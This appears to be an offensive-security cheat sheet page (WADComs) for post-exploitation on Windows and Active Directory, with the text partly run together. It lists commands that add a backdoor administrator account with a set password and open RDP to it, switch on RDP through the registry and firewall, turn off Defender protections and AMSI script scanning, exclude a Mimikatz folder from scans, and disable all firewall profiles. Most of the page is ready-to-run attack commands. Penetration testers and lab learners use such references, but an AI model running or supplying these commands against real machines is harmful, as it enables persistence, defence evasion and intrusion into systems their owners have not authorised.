net user asuka 'TrYh@rdeR!'/addnet localgroup "Remote Desktop Users" asuka /addnet localgroup "Administrators" asuka /add# Then access with xfreerdpxfreerdp /dynamic-resolution +clipboard /cert:ignore /v:support.htb \/u:asuka /p:'TrYh@rdeR!'+nego# or using rdesktoprdesktop support.htb
Enable RDP Access
Set-ItemProperty-Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections"-value 0Enable-NetFirewallRule-DisplayGroup "Remote Desktop"# In case powershell is not enabled (like in old machine)reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Disable Defender Feature
Get-MpComputerStatusSet-MpPreference-DisableRealtimeMonitoring $trueSet-MpPreference-DisableIOAVProtection $trueSet-MpPreference-ExclusionExtension "ps1"Set-MPPreference-DisableBehaviorMonitoring $true# Disable AMSI (set to 0 to enable)Set-MpPreference-DisableScriptScanning 1# Add folder exclusion (in case tamper protection is enabled)Add-MpPreference-ExclusionPath C:\Mimikatz\# Check all exclusion folderGet-MpPreference|Select-Object-Property ExclusionPath -ExpandProperty ExclusionPath# Disable Real Time Protectionreg delete "HKLM\Software\Policies\Microsoft\Windows Defender"/freg add "HKLM\Software\Policies\Microsoft\Windows Defender"/v "DisableAntiSpyware"/t REG_DWORD /d "1"/freg add "HKLM\Software\Policies\Microsoft\Windows Defender"/v "DisableAntiVirus"/t REG_DWORD /d "1"/f
Turn Off Firewall
Set-NetFirewallProfile-Profile Domain,Public,Private -Enabled False# ornetsh advfirewall set allprofiles state off
Get-ClipboardContents
Monitors the clipboard on a specified interval for changes to copied text.
WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.